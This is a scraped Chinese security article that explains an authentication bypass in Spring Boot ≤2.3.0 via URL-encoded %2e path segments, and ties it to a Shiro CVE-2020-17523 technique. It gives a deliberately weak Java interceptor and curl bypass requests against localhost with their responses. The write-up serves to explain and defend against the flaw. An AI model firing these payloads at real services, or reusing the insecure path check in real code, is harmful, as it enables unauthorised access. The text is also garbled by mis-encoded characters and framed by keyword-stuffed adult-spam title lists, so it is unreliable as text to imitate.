成人在线亚洲_国产日韩视频一区二区三区_久久久国产精品_99国内精品久久久久久久

您的位置:首頁技術(shù)文章
文章詳情頁

詳解SpringBoot中關(guān)于%2e的Trick

瀏覽:6日期:2023-03-17 18:46:10

分享一個(gè)SpringBoot中關(guān)于%2e的小Trick。先說結(jié)論,當(dāng)SpringBoot版本在小于等于2.3.0.RELEASE的情況下, alwaysUseFullPath 為默認(rèn)值false,這會使得其獲取ServletPath,所以在路由匹配時(shí)會對 %2e 進(jìn)行解碼,這可能導(dǎo)致身份驗(yàn)證繞過。而反過來由于高版本將 alwaysUseFullPath 自動(dòng)配置成了true從而開啟全路徑,又可能導(dǎo)致一些安全問題。

這里我們來通過一個(gè)例子看一下這個(gè)Trick,并分析它的原因。

首先我們先來設(shè)置SprinBoot版本

<parent><groupId>org.springframework.boot</groupId><artifactId>spring-boot-starter-parent</artifactId><version>2.3.0.RELEASE</version><relativePath/> <!-- lookup parent from repository --> </parent>

編寫一個(gè)Controller

@RestControllerpublic class httpbinController { @RequestMapping(value = 'no-auth', method = RequestMethod.GET) public String noAuth() {return 'no-auth'; } @RequestMapping(value = 'auth', method = RequestMethod.GET) public String auth() {return 'auth'; }}

接下來配置對應(yīng)的Interceptor來實(shí)現(xiàn)對除no-auth以外的路由的攔截

@Configurationpublic class WebMvcConfig implements WebMvcConfigurer { @Override public void addInterceptors(InterceptorRegistry registry) {registry.addInterceptor(handlerInterceptor())//配置攔截規(guī)則.addPathPatterns('/**'); } @Bean public HandlerInterceptor handlerInterceptor() {return new PermissionInterceptor(); }}

@Componentpublic class PermissionInterceptor implements HandlerInterceptor { @Override public boolean preHandle(HttpServletRequest request, HttpServletResponse response, Object handler) throws Exception {String uri = request.getRequestURI();uri = uri.replaceAll('//', '/');System.out.println('RequestURI: '+uri);if (uri.contains('..') || uri.contains('./') ) { return false;}if (uri.startsWith('/no-auth')){ return true;}return false; }}

由上面代碼可以知道它使用了getRequestURI來進(jìn)行路由判斷。通常你可以看到如 startsWith , contains 這樣的判斷方式,顯然這是不安全的,我們繞過方式由很多比如 .. 或 ..; 等,但其實(shí)在用 startsWith 來判斷白名單時(shí)構(gòu)造都離不開跨目錄的符號 ..那么像上述代碼這種情況又如何來繞過呢?答案就是 %2e發(fā)起請求如下

$ curl -v 'http://127.0.0.1:8080/no-auth/%2e%2e/auth'* Trying 127.0.0.1...* TCP_NODELAY set* Connected to 127.0.0.1 (127.0.0.1) port 8080 (#0)> GET /no-auth/%2e%2e/auth HTTP/1.1> Host: 127.0.0.1:8080> User-Agent: curl/7.64.1> Accept: */*>< HTTP/1.1 200< Content-Type: text/plain;charset=UTF-8< Content-Length: 4< Date: Wed, 14 Apr 2021 13:22:03 GMT<* Connection #0 to host 127.0.0.1 left intactauth* Closing connection 0

RequestURI輸出為

RequestURI: /no-auth/%2e%2e/auth

可以看到我們通過 %2e%2e 繞過了PermissionInterceptor的判斷,同時(shí)匹配路由成功,很顯然應(yīng)用在進(jìn)行路由匹配時(shí)對 %2e 進(jìn)行了解碼。

我們再來切換SpringBoot版本再來看下

<version>2.3.1.RELEASE</version>

發(fā)起請求,當(dāng)然也是過了攔截,但沒有匹配路由成功,返回404

$ curl -v 'http://127.0.0.1:8080/no-auth/%2e%2e/auth'* Trying 127.0.0.1...* TCP_NODELAY set* Connected to 127.0.0.1 (127.0.0.1) port 8080 (#0)> GET /no-auth/%2e%2e/auth HTTP/1.1> Host: 127.0.0.1:8080> User-Agent: curl/7.64.1> Accept: */*>< HTTP/1.1 404< Vary: Origin< Vary: Access-Control-Request-Method< Vary: Access-Control-Request-Headers< Content-Length: 0< Date: Wed, 14 Apr 2021 13:17:26 GMT<* Connection #0 to host 127.0.0.1 left intact* Closing connection 0

RequestURI輸出為

RequestURI: /no-auth/%2e%2e/auth

可以得出結(jié)論當(dāng)SpringBoot版本在小于等于2.3.0.RELEASE的情況下,其在路由匹配時(shí)會對 %2e 進(jìn)行解碼,這可能導(dǎo)致身份驗(yàn)證繞過。

那么又為什么會這樣?

在SpringMVC進(jìn)行路由匹配時(shí)會從DispatcherServlet開始,然后到HandlerMapping中去獲取Handler,在這個(gè)時(shí)候就會進(jìn)行對應(yīng)path的匹配。

我們來跟進(jìn)代碼看這個(gè)關(guān)鍵的地方 org.springframework.web.util.UrlPathHelper#getLookupPathForRequest(javax.servlet.http.HttpServletRequest)這里就出現(xiàn)有趣的現(xiàn)象,在2.3.0.RELEASE中 alwaysUseFullPath 為默認(rèn)值false

詳解SpringBoot中關(guān)于%2e的Trick

而在2.3.1.RELEASE中 alwaysUseFullPath 被設(shè)置成了true

詳解SpringBoot中關(guān)于%2e的Trick

這也就導(dǎo)致了不同的結(jié)果,一個(gè)走向了 getPathWithinApplication 而另一個(gè)走向了 getPathWithinServletMapping在 getPathWithinServletMapping 中會獲取ServletPath,ServletPath會對其解碼,這個(gè)很多講Tomcat url差異的文章都提過了,就不多說了。所以解釋了最終出現(xiàn)繞過的情況。

那么Trick的具體描述就成了當(dāng)SpringBoot版本在小于等于2.3.0.RELEASE的情況下, alwaysUseFullPath 為默認(rèn)值false,這會使得其獲取ServletPath,所以在路由匹配時(shí)會對 %2e 進(jìn)行解碼,這可能導(dǎo)致身份驗(yàn)證繞過。

而這和Shiro的CVE-2020-17523中的一個(gè)姿勢形成了呼應(yīng),只要高版本SpringBoot就可以了不用非要手動(dòng)設(shè)置 alwaysUseFullPath

$ curl -v http://127.0.0.1:8080/admin/%2e* Trying 127.0.0.1...* TCP_NODELAY set* Connected to 127.0.0.1 (127.0.0.1) port 8080 (#0)> GET /admin/%2e HTTP/1.1> Host: 127.0.0.1:8080> User-Agent: curl/7.64.1> Accept: */*>< HTTP/1.1 200< Content-Type: text/plain;charset=UTF-8< Content-Length: 10< Date: Wed, 14 Apr 2021 13:48:33 GMT<* Connection #0 to host 127.0.0.1 left intactadmin page* Closing connection 0

感興趣的可以再看看說不定有額外收獲

話說回來,可是為什么在高版本中 alwaysUseFullPath 會被設(shè)置成true呢?

這就要追溯到 org.springframework.boot.autoconfigure.web.servlet.WebMvcAutoConfiguration.WebMvcAutoConfigurationAdapter#configurePathMatch在spring-boot-autoconfigure-2.3.0.RELEASE中

詳解SpringBoot中關(guān)于%2e的Trick

在spring-boot-autoconfigure-2.3.1.RELEASE中

詳解SpringBoot中關(guān)于%2e的Trick

為什么要這樣設(shè)置?我們查看git log這里給出了答案。

詳解SpringBoot中關(guān)于%2e的Trick

https://github.com/spring-projects/spring-boot/commit/a12a3054c9c5dded034ee72faac20e578b5503af

當(dāng)Servlet映射為”/”時(shí),官方認(rèn)為這樣配置是更有效率的,因?yàn)樾枰埱舐窂降奶幚磔^少。

配置servlet.path可以通過如下,但通常不會這樣配置除非有特殊需求。

spring.mvc.servlet.path=/test/

所以最后,當(dāng)SpringBoot版本在小于等于2.3.0.RELEASE的情況下, alwaysUseFullPath 為默認(rèn)值false,這會使得其獲取ServletPath,所以在路由匹配時(shí)會對 %2e 進(jìn)行解碼,這可能導(dǎo)致身份驗(yàn)證繞過。而高版本為了提高效率對 alwaysUseFullPath 自動(dòng)配置成了true從而開啟全路徑,這又造就了Shiro的CVE-2020-17523中的一個(gè)利用姿勢。

到此這篇關(guān)于詳解SpringBoot中關(guān)于%2e的Trick的文章就介紹到這了,更多相關(guān)SpringBoot Trick內(nèi)容請搜索好吧啦網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章希望大家以后多多支持好吧啦網(wǎng)!

標(biāo)簽: Spring
相關(guān)文章:
成人在线亚洲_国产日韩视频一区二区三区_久久久国产精品_99国内精品久久久久久久
久久精品视频网| 亚洲综合av网| 亚洲欧洲无码一区二区三区| 成人综合婷婷国产精品久久蜜臀| 色婷婷精品久久二区二区蜜臀av| 亚洲精品视频一区二区| 欧美日韩 国产精品| 精品国内二区三区| 韩国精品一区二区| 欧美色区777第一页| 无吗不卡中文字幕| 久久久精品午夜少妇| 亚洲愉拍自拍另类高清精品| 一区视频在线| 欧美精品一区二区三区一线天视频| 激情综合亚洲精品| 欧美日韩一级二级| 久久不见久久见免费视频7| 亚洲综合精品| 亚洲一级电影视频| 国产欧美日韩一区| 一区二区三区高清| 亚洲精品乱码久久久久久蜜桃91| 日韩一区欧美小说| 欧美日韩一视频区二区| 国产欧美日韩三区| 欧美精品三区| 国产精品视频你懂的| 欧美一区成人| 国产日韩精品一区二区三区在线| 91免费看片在线观看| 久久精品视频网| 91亚洲男人天堂| 久久久精品国产免费观看同学| 色综合婷婷久久| 中文字幕不卡一区| 亚洲国产高清一区| 亚洲激情校园春色| 性欧美暴力猛交另类hd| 午夜视频在线观看一区二区三区| 亚洲欧美激情诱惑| 亚洲影视在线观看| 免费久久99精品国产自| 五月激情综合网| 色婷婷香蕉在线一区二区| 天堂成人国产精品一区| 色网站国产精品| 久久精品99国产精品| 欧美久久一二三四区| 国产精品一卡二| 欧美精品一区二区久久婷婷| 欧美大片专区| 亚洲伦理在线免费看| 久久伊人亚洲| 国产呦精品一区二区三区网站| 在线播放亚洲一区| 国产aⅴ综合色| 国产色爱av资源综合区| 亚洲第一网站| 亚洲成在人线免费| 欧美综合天天夜夜久久| 国产曰批免费观看久久久| 欧美tk丨vk视频| 欧美日韩精品| 亚洲精品久久7777| 色欧美乱欧美15图片| 国产一区二区在线视频| 久久久亚洲精品石原莉奈| 国内精品一区二区| 亚洲成人av电影在线| 欧美日韩国产综合一区二区 | 国产精品国产自产拍在线| 亚洲看片网站| 五月婷婷综合网| 欧美一二区视频| 韩国欧美一区| 婷婷六月综合亚洲| 日韩美女一区二区三区四区| 黑丝一区二区| 午夜伊人狠狠久久| 欧美一区三区四区| 亚洲视频一区| 美女网站视频久久| 精品久久99ma| 极品裸体白嫩激情啪啪国产精品| 五月婷婷欧美视频| 日韩一区二区三区精品视频| 亚洲性人人天天夜夜摸| 日韩—二三区免费观看av| 日韩视频一区二区| 99精品欧美| 国产一区二区三区高清播放| 日本一区二区在线不卡| 久久精品日产第一区二区| 成人蜜臀av电影| 亚洲午夜羞羞片| 日韩欧美色电影| 国产精品久久久一区二区三区| 国产一区二区免费看| 中文字幕欧美一区| 欧美日韩国产一区二区三区地区| 国产一区二区无遮挡| 久久99在线观看| 国产欧美精品在线观看| 在线观看国产一区二区| 欧美精品国产一区| 久久91精品国产91久久小草| 国产精品久久久久久久久晋中| 色88888久久久久久影院野外| 91一区二区在线观看| 日产精品久久久久久久性色| 国产日韩影视精品| 在线视频欧美精品| 欧美日韩亚洲一区在线观看| 久久99精品国产91久久来源| 最新国产成人在线观看| 欧美一区二区性放荡片| 亚洲综合国产| 99精品久久免费看蜜臀剧情介绍| 免费成人性网站| 亚洲品质自拍视频网站| 日韩一区二区三区高清免费看看| 欧美亚洲一区| 欧美福利网址| 国产精品99久久久| 亚洲国产视频一区二区| 久久久久久免费毛片精品| 欧美在线综合视频| 亚洲精品影院| 972aa.com艺术欧美| 精品一区二区在线免费观看| 亚洲男同性视频| 久久女同互慰一区二区三区| 在线观看日韩一区| 99精品视频免费观看| 91香蕉国产在线观看软件| 久久99热99| 亚洲午夜羞羞片| 亚洲同性gay激情无套| 欧美xxxxx牲另类人与| 色欧美88888久久久久久影院| 亚洲性图久久| 91免费视频观看| 国产999精品久久| 久久精品久久99精品久久| 亚洲综合久久久| 中国色在线观看另类| 日韩你懂的在线播放| 欧美日韩在线播放三区四区| 性色一区二区三区| 亚洲欧洲精品一区二区| 欧美在线高清| 成人免费看片app下载| 精品一区二区三区免费播放| 亚洲一区二区三区四区在线| 中文字幕一区二区三区四区| 久久久欧美精品sm网站| 日韩无一区二区| 欧美视频日韩视频在线观看| 亚洲一区二区精品在线| 欧美日韩在线精品一区二区三区| 高清在线不卡av| 蜜桃91丨九色丨蝌蚪91桃色| 亚洲国产日产av| 亚洲欧美国产高清| 亚洲视频一区在线| 亚洲国产经典视频| 久久久综合九色合综国产精品| 欧美一级二级在线观看| 欧美日韩国产免费| 欧洲激情一区二区| 久久综合九色99| 老鸭窝91久久精品色噜噜导演| 一区二区三区精品视频在线观看| 黑人中文字幕一区二区三区| 色综合天天综合网国产成人综合天| 高清视频一区二区| 国产成人一区在线| 国产精品一级二级三级| 久99久精品视频免费观看| 青娱乐精品在线视频| 亚洲妇熟xx妇色黄| 一区二区激情小说| 亚洲成人av免费| 午夜av电影一区| 日韩高清中文字幕一区| 青青草91视频| 久久精品国产一区二区| 久草中文综合在线| 国产乱子伦视频一区二区三区| 国产一区二区主播在线| 高清av一区二区| www.综合网.com| 91蜜桃传媒精品久久久一区二区 | 性色一区二区| 久久成人一区| 久久国产免费| 在线观看av不卡| 欧美一区二区三区四区五区| 日韩情涩欧美日韩视频|